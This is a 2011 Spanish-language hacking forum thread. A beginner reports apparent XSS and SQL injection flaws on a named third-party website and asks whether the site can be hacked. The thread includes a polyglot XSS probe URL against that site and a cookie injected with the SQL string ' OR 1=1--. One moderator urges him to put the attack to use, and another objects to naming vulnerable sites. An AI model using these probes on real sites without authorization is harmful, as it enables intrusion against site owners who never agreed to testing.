elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Vulnerabilidad XSS		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Vulnerabilidad XSS  (Leído 4,405 veces)
iiitttaaa

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Vulnerabilidad XSS
« en: 24 Junio 2011, 03:31 am »
Hola recientemente creo haber descubierto una vulnerabilidad xss en una pagina que hace poco le habia descubierto una sql que creo que la eliminaron realmente soy nuevo y nescecito saber si se puede hackear con xss o sql esta pagina

http://colaboranet.com/nctol/
gracias
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Vulnerabilidad XSS
« Respuesta #1 en: 24 Junio 2011, 03:34 am »
Si descubriste el XSS porque no ponerlo en marcha?
En línea
Te vendería mi talento por poder dormir tranquilo.
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Vulnerabilidad XSS
« Respuesta #2 en: 24 Junio 2011, 06:39 am »
Enséñanos como la descubriste y como la olvidaste  :o

PD: Creo que no puedes dar referencias a páginas apuntando vulnerabilidades

Saludos
En línea

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
iiitttaaa

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Vulnerabilidad XSS
« Respuesta #3 en: 24 Junio 2011, 16:01 pm »
Pues como dije soy nuevo pero no se si esto sea un xss

http://colaboranet.com/nctol/index.php?e=1';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
Me aparece el alert diciendo XSS
En línea
iiitttaaa

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Vulnerabilidad XSS
« Respuesta #4 en: 24 Junio 2011, 16:07 pm »
Y de sql maneje las cookies
edite colaboranet_usr con el dato ' OR 1=1-- Y me aparecia un codigo de sql con el error pero si haora lo intento simplñemente se queda en blanco la pagina
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Vulnerabilidad RFI?
Nivel Web 		Littl3 8 6,792 Último mensaje 18 Junio 2008, 15:49 pm
por Littl3
vulnerabilidad smf 1.1.11 « 1 2 »
Nivel Web 		alxx 13 9,832 Último mensaje 3 Febrero 2010, 21:08 pm
por alxx
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines